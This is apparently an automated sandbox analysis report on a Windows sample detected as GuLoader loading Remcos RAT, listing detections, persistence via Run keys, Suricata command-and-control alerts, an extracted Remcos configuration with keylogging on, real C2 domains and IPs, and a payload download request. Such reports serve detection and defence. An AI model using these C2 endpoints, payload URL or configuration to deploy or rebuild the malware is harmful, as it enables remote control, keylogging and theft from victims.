Edit tour

Windows Analysis Report
x6yDsHJ9tr.exe

Overview

General Information

Sample name:	x6yDsHJ9tr.exe (renamed file extension from none to exe, renamed because original name is a hash value)
Original sample name:	4e8d586a950492c30147b7d56bcfad49cd577966
Analysis ID:	1590938
MD5:	25eec63edf7c0eb8628a89712b5cb363
SHA1:	4e8d586a950492c30147b7d56bcfad49cd577966
SHA256:	e075807417590255de4d395fa3dfbc336e88c96bbab8afca1d5e5d5abbac0237
Infos:

Detection

Remcos, GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected Remcos RAT

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Remcos

Suricata IDS alerts for network traffic

Yara detected GuLoader

Yara detected Remcos RAT

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Connects to many ports of the same IP (likely port scanning)

Installs a global keyboard hook

Sigma detected: New RUN Key Pointing to Suspicious Folder

Switches to a custom stack to bypass stack traces

Tries to detect virtualization through RDTSC time measurements

Abnormal high CPU Usage

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to dynamically determine API calls

Contains functionality to shutdown / reboot the system

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Sigma detected: CurrentVersion Autorun Keys Modification

Sleep loop found (likely to delay execution)

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

x6yDsHJ9tr.exe (PID: 1672 cmdline: "C:\Users\user\Desktop\x6yDsHJ9tr.exe" MD5: 25EEC63EDF7C0EB8628A89712B5CB363)

x6yDsHJ9tr.exe (PID: 5064 cmdline: "C:\Users\user\Desktop\x6yDsHJ9tr.exe" MD5: 25EEC63EDF7C0EB8628A89712B5CB363)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Remcos, RemcosRAT	Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.	APT33 The Gorgon Group UAC-0050	http://malware-traffic-analysis.net/2017/12/22/index.html https://0xmrmagnezi.github.io/malware%20analysis/RemcosRAT/ https://asec.ahnlab.com/en/32376/ https://asec.ahnlab.com/ko/25837/ https://asec.ahnlab.com/ko/32101/	https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["linktreewealth.zapto.org:3980:0", "linktreewealth.zapto.org:3981:1", "linktreewealthy.zapto.org:3980:0"], "Assigned name": "Manifest", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-0B1XIG", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\ProgramData\remcos\logs.dat	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000004.00000002.4594924412.00000000368EE000.00000004.00000010.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000004.00000002.4573553882.0000000006AE4000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000004.00000002.4573553882.0000000006B13000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000004.00000002.4573553882.0000000006AA8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000000.00000002.3373583635.0000000006C89000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: x6yDsHJ9tr.exe PID: 5064	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Click to see the 1 entries

Sigma Signatures

System Summary

Sigma detected: New RUN Key Pointing to Suspicious Folder

Source: Registry Key set

Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\fejlbetjening\Rockerfest.bat, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\x6yDsHJ9tr.exe, ProcessId: 5064, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Unvanquished

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\fejlbetjening\Rockerfest.bat, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\x6yDsHJ9tr.exe, ProcessId: 5064, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Unvanquished

Stealing of Sensitive Information

Sigma detected: Remcos

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\x6yDsHJ9tr.exe, ProcessId: 5064, TargetFilename: C:\ProgramData\remcos\logs.dat

Suricata Signatures

ET JA3 Hash - Remcos 3.x/4.x TLS Connection

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-14T15:42:29.698777+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.5	49980	43.226.229.209	3981	TCP
2025-01-14T15:42:33.363017+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.5	49982	43.226.229.209	3981	TCP
2025-01-14T15:42:37.051458+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.5	49984	43.226.229.209	3981	TCP
2025-01-14T15:42:40.810433+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.5	49986	43.226.229.209	3981	TCP
2025-01-14T15:42:44.541062+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.5	49988	43.226.229.209	3981	TCP
2025-01-14T15:42:48.217968+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.5	49990	43.226.229.209	3981	TCP
2025-01-14T15:42:51.901137+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.5	49992	43.226.229.209	3981	TCP
2025-01-14T15:42:55.612992+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.5	49994	43.226.229.209	3981	TCP
2025-01-14T15:42:59.283210+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.5	49996	43.226.229.209	3981	TCP
2025-01-14T15:43:02.985662+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.5	49998	43.226.229.209	3981	TCP
2025-01-14T15:43:06.666825+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.5	50000	43.226.229.209	3981	TCP
2025-01-14T15:43:10.354616+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.5	50002	43.226.229.209	3981	TCP
2025-01-14T15:43:14.000222+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.5	50004	43.226.229.209	3981	TCP
2025-01-14T15:43:17.680003+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.5	50006	43.226.229.209	3981	TCP
2025-01-14T15:43:21.414273+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.5	50008	43.226.229.209	3981	TCP
2025-01-14T15:43:25.106962+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.5	50010	43.226.229.209	3981	TCP
2025-01-14T15:43:28.780669+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.5	50012	43.226.229.209	3981	TCP
2025-01-14T15:43:32.465387+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.5	50014	43.226.229.209	3981	TCP
2025-01-14T15:43:36.189030+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.5	50016	43.226.229.209	3981	TCP
2025-01-14T15:43:39.883020+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.5	50018	43.226.229.209	3981	TCP
2025-01-14T15:43:43.560205+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.5	50020	43.226.229.209	3981	TCP
2025-01-14T15:43:47.316159+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.5	50022	43.226.229.209	3981	TCP
2025-01-14T15:43:51.006361+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.5	50024	43.226.229.209	3981	TCP
2025-01-14T15:43:54.684683+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.5	50026	43.226.229.209	3981	TCP
2025-01-14T15:43:58.413124+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.5	50028	43.226.229.209	3981	TCP
2025-01-14T15:44:02.141533+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.5	50030	43.226.229.209	3981	TCP
2025-01-14T15:44:06.062993+0100	2036594	1	Malware Command and Control Activity Detected	192.168.2.5	50032	43.226.229.209	3981	TCP

ET MALWARE Remcos 3.x Unencrypted Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-14T15:42:27.059228+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.5	49979	43.226.229.209	3980	TCP
2025-01-14T15:42:30.732264+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.5	49981	43.226.229.209	3980	TCP
2025-01-14T15:42:34.391044+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.5	49983	43.226.229.209	3980	TCP
2025-01-14T15:42:38.109274+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.5	49985	43.226.229.209	3980	TCP
2025-01-14T15:42:41.841612+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.5	49987	43.226.229.209	3980	TCP
2025-01-14T15:42:45.576043+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.5	49989	43.226.229.209	3980	TCP
2025-01-14T15:42:49.233656+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.5	49991	43.226.229.209	3980	TCP
2025-01-14T15:42:52.935342+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.5	49993	43.226.229.209	3980	TCP
2025-01-14T15:42:56.623911+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.5	49995	43.226.229.209	3980	TCP
2025-01-14T15:43:00.310270+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.5	49997	43.226.229.209	3980	TCP
2025-01-14T15:43:03.997903+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.5	49999	43.226.229.209	3980	TCP
2025-01-14T15:43:07.701426+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.5	50001	43.226.229.209	3980	TCP
2025-01-14T15:43:11.372776+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.5	50003	43.226.229.209	3980	TCP
2025-01-14T15:43:15.029106+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.5	50005	43.226.229.209	3980	TCP
2025-01-14T15:43:18.782844+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.5	50007	43.226.229.209	3980	TCP
2025-01-14T15:43:22.435609+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.5	50009	43.226.229.209	3980	TCP
2025-01-14T15:43:26.122511+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.5	50011	43.226.229.209	3980	TCP
2025-01-14T15:43:29.810398+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.5	50013	43.226.229.209	3980	TCP
2025-01-14T15:43:33.482595+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.5	50015	43.226.229.209	3980	TCP
2025-01-14T15:43:37.218328+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.5	50017	43.226.229.209	3980	TCP
2025-01-14T15:43:40.904556+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.5	50019	43.226.229.209	3980	TCP
2025-01-14T15:43:44.593686+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.5	50021	43.226.229.209	3980	TCP
2025-01-14T15:43:48.327339+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.5	50023	43.226.229.209	3980	TCP
2025-01-14T15:43:52.028883+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.5	50025	43.226.229.209	3980	TCP
2025-01-14T15:43:55.700248+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.5	50027	43.226.229.209	3980	TCP
2025-01-14T15:43:59.450332+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.5	50029	43.226.229.209	3980	TCP
2025-01-14T15:44:03.378073+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.5	50031	43.226.229.209	3980	TCP
2025-01-14T15:44:10.294478+0100	2032776	1	Malware Command and Control Activity Detected	192.168.2.5	50033	43.226.229.209	3980	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-14T15:42:21.159945+0100	2803270	2	Potentially Bad Traffic	192.168.2.5	49978	109.99.162.14	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000004.00000002.4573553882.0000000006AE4000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: Remcos {"Host:Port:Password": ["linktreewealth.zapto.org:3980:0", "linktreewealth.zapto.org:3981:1", "linktreewealthy.zapto.org:3980:0"], "Assigned name": "Manifest", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-0B1XIG", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\fejlbetjening\Rockerfest.bat

ReversingLabs: Detection: 26%

Multi AV Scanner detection for submitted file

Source: x6yDsHJ9tr.exe	Virustotal: Detection: 34%			Perma Link
Source: x6yDsHJ9tr.exe	ReversingLabs: Detection: 26%

Yara detected Remcos RAT

Source: Yara match	File source: 00000004.00000002.4594924412.00000000368EE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4573553882.0000000006AE4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4573553882.0000000006B13000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4573553882.0000000006AA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: x6yDsHJ9tr.exe PID: 5064, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: x6yDsHJ9tr.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 109.99.162.14:443 -> 192.168.2.5:49978 version: TLS 1.2

Source: x6yDsHJ9tr.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: mshtml.pdb source: x6yDsHJ9tr.exe, 00000004.00000001.3371870256.0000000000649000.00000020.00000001.01000000.00000007.sdmp
Source:	Binary string: mshtml.pdbUGP source: x6yDsHJ9tr.exe, 00000004.00000001.3371870256.0000000000649000.00000020.00000001.01000000.00000007.sdmp

Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe	Code function: 0_2_004069DF FindFirstFileW,FindClose,	0_2_004069DF
Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe	Code function: 0_2_00405D8E CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405D8E
Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe	Code function: 0_2_00402910 FindFirstFileW,	0_2_00402910

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49985 -> 43.226.229.209:3980
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49997 -> 43.226.229.209:3980
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49993 -> 43.226.229.209:3980
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:50001 -> 43.226.229.209:3980
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49979 -> 43.226.229.209:3980
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49983 -> 43.226.229.209:3980
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49999 -> 43.226.229.209:3980
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50008 -> 43.226.229.209:3981
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49994 -> 43.226.229.209:3981
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50016 -> 43.226.229.209:3981
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49984 -> 43.226.229.209:3981
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:50013 -> 43.226.229.209:3980
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49995 -> 43.226.229.209:3980
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50010 -> 43.226.229.209:3981
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49987 -> 43.226.229.209:3980
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:50009 -> 43.226.229.209:3980
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49992 -> 43.226.229.209:3981
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:50027 -> 43.226.229.209:3980
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:50005 -> 43.226.229.209:3980
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50004 -> 43.226.229.209:3981
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50002 -> 43.226.229.209:3981
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:50025 -> 43.226.229.209:3980
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50022 -> 43.226.229.209:3981
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49982 -> 43.226.229.209:3981
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50018 -> 43.226.229.209:3981
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49986 -> 43.226.229.209:3981
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50014 -> 43.226.229.209:3981
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49991 -> 43.226.229.209:3980
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:50019 -> 43.226.229.209:3980
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49988 -> 43.226.229.209:3981
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50030 -> 43.226.229.209:3981
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:50003 -> 43.226.229.209:3980
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:50023 -> 43.226.229.209:3980
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:50011 -> 43.226.229.209:3980
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49989 -> 43.226.229.209:3980
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50026 -> 43.226.229.209:3981
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:50021 -> 43.226.229.209:3980
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:50017 -> 43.226.229.209:3980
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50024 -> 43.226.229.209:3981
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49998 -> 43.226.229.209:3981
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50006 -> 43.226.229.209:3981
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:50033 -> 43.226.229.209:3980
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50032 -> 43.226.229.209:3981
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49990 -> 43.226.229.209:3981
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50020 -> 43.226.229.209:3981
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:50029 -> 43.226.229.209:3980
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50012 -> 43.226.229.209:3981
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:50031 -> 43.226.229.209:3980
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49981 -> 43.226.229.209:3980
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50000 -> 43.226.229.209:3981
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:50015 -> 43.226.229.209:3980
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49980 -> 43.226.229.209:3981
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:50007 -> 43.226.229.209:3980
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49996 -> 43.226.229.209:3981
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:50028 -> 43.226.229.209:3981

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: linktreewealth.zapto.org
Source: Malware configuration extractor	URLs: linktreewealth.zapto.org
Source: Malware configuration extractor	URLs: linktreewealthy.zapto.org

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 43.226.229.209 ports 3980,3981,0,3,8,9

Source: global traffic

TCP traffic: 192.168.2.5:49979 -> 43.226.229.209:3980

Source: Joe Sandbox View

IP Address: 109.99.162.14 109.99.162.14

Source: Joe Sandbox View

ASN Name: SOFTLAYERUS SOFTLAYERUS

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic

Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49978 -> 109.99.162.14:443

Source: global traffic

HTTP traffic detected: GET /NJrdZqNcCtz102.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: teldrum.roCache-Control: no-cache

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

